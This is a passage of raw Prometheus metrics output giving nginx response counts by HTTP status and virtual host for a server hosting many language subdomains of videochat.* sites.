nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sco.videochat.world"} 1459 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sdun.io"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sdxrfnl.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="secure.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sefi.videochat.mx"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="serve.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="server.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="shop.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.cafe"} 1627 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.date"} 1117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.mx"} 5083 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.show"} 617 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.tv.br"} 1671 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="si.videochat.world"} 1748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sitemap.videochat.mx"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sitemaps.videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.cafe"} 2386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.date"} 3699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.mx"} 9143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.show"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.tv.br"} 2034 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sk.videochat.world"} 3447 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.cafe"} 2311 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.date"} 3202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.mx"} 6549 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.show"} 509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.tv.br"} 2772 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sl.videochat.world"} 4185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sptlqmk.videochat.mx"} 606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.cafe"} 1796 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.date"} 3462 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.mx"} 4693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.show"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.tv.br"} 2339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sr.videochat.world"} 1846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ssl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="staging.videochat.mx"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="static.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="stl.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="store.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.cafe"} 1982 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.date"} 496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.mx"} 5006 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.show"} 143 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.tv.br"} 1467 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="su.videochat.world"} 1730 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="support.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.cafe"} 4554 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.date"} 3786 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.mx"} 5237 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.show"} 609 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.tv.br"} 1243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sv.videochat.world"} 1839 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.cafe"} 1759 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.date"} 414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.mx"} 4386 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.show"} 343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.tv.br"} 2031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="sw.videochat.world"} 1444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="swarajv.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.cafe"} 1279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.date"} 126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.mx"} 4512 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.show"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.tv.br"} 2085 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ta.videochat.world"} 1609 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.cafe"} 1836 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.date"} 492 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.mx"} 5813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.show"} 365 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.tv.br"} 1585 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="te.videochat.world"} 3456 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="test.videochat.mx"} 96 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.cafe"} 1706 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.date"} 566 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.mx"} 5873 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.show"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.tv.br"} 1600 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tg.videochat.world"} 3805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.cafe"} 1758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.date"} 390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.mx"} 6388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.show"} 480 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.tv.br"} 1815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="th.videochat.world"} 3665 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="thingsworko.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tknyauk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tkzc668.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.cafe"} 1711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.date"} 3987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.mx"} 5236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.show"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.tv.br"} 1536 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tl.videochat.world"} 4423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tmfludki4a.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tokenid.rouwowu.ru"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tpjwrchm.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.cafe"} 1510 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.date"} 424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.mx"} 5247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.show"} 264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.tv.br"} 2377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tr.videochat.world"} 1798 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tswyino.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.cafe"} 2831 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.date"} 408 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.mx"} 4200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.show"} 509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.tv.br"} 1986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="tt.videochat.world"} 1675 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uavnrde.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.cafe"} 1576 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.date"} 329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.mx"} 4735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.show"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.tv.br"} 1806 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="udm.videochat.world"} 1815 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.cafe"} 1960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.date"} 3240 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.mx"} 5113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.show"} 565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.tv.br"} 2258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uk.videochat.world"} 1985 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ukfybkk.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.cafe"} 1426 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.date"} 504 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.mx"} 5796 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.show"} 299 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.tv.br"} 1846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ur.videochat.world"} 1802 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uxoskmy.videochat.mx"} 309 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.cafe"} 1680 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.date"} 755 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.mx"} 6387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.show"} 208 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.tv.br"} 2606 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uz.videochat.world"} 4136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="uzjrval.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="v.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.cafe"} 1674 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.date"} 536 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.mx"} 5258 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.show"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.tv.br"} 1343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vi.videochat.world"} 1817 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.cafe"} 12222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.date"} 11115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.mx"} 22013 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.show"} 9451 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.tv.br"} 18073 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="videochat.world"} 15193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="visionsoult.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="vmi460104.contaboserver.net"} 7137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="w8wmixrekc.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="waddusldhw.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="waqqvxh.videochat.mx"} 281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="webmail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wipnbpt.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wjftnkk.videochat.mx"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wmiqjupdanpt.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wngqune.videochat.mx"} 560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wohmskm.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wordpress.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wp.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="wrozblo.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.bsncdn.org"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.c14.co.il"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.ee.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.google.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.he.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.iranintl.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.lv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.mi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.my.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.pornhub.com"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.pt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.s1v7n3w5g.vip:9527"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.tryidc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.cafe"} 1955 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.date"} 2218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.mx"} 4969 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.show"} 1200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.tv.br"} 54 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="www.videochat.world"} 2809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xbodfbs.videochat.mx"} 381 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.cafe"} 1339 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.date"} 368 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.mx"} 6788 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.show"} 148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.tv.br"} 2078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xh.videochat.world"} 4022 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="xicipcrvyobs.videochat.mx"} 210 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ybifrit.videochat.mx"} 605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ycgaupt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.cafe"} 2391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.date"} 520 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.mx"} 4430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.show"} 248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.tv.br"} 3735 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yi.videochat.world"} 1508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yrsjwka.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="yudawam.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="z21yjuddiv.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="z9cbyhzq8t.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.cafe"} 1472 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.date"} 3857 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.mx"} 6066 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.show"} 483 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.tv.br"} 1482 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zh.videochat.world"} 1725 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zhgeabg.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="ztpbram.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="zxjzggl.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="408",vhost="-"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="-"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="127.0.0.1:80"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="127.0.0.1:8080"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="158.94.208.27"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="161.97.120.25"} 355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="161.97.120.25:80"} 168 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="25.120.97.161:80"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="admin.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.cafe"} 18 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.date"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.show"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.tv.br"} 115 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="af.videochat.world"} 355 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.cafe"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.tv.br"} 137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="al.videochat.world"} 110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.cafe"} 21 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.show"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.tv.br"} 232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="am.videochat.world"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="api.videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="app.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.cafe"} 45 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.date"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.mx"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.show"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.tv.br"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ar.videochat.world"} 93 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.cafe"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.tv.br"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="az.videochat.world"} 199 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.cafe"} 50 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.show"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.tv.br"} 1014 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="ba.videochat.world"} 46 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="backend.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.date"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.mx"} 33 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.show"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.tv.br"} 300 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="be.videochat.world"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.cafe"} 28 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.date"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.show"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.tv.br"} 147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bg.videochat.world"} 103 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="499",vhost="bn.videochat.cafe"} 11 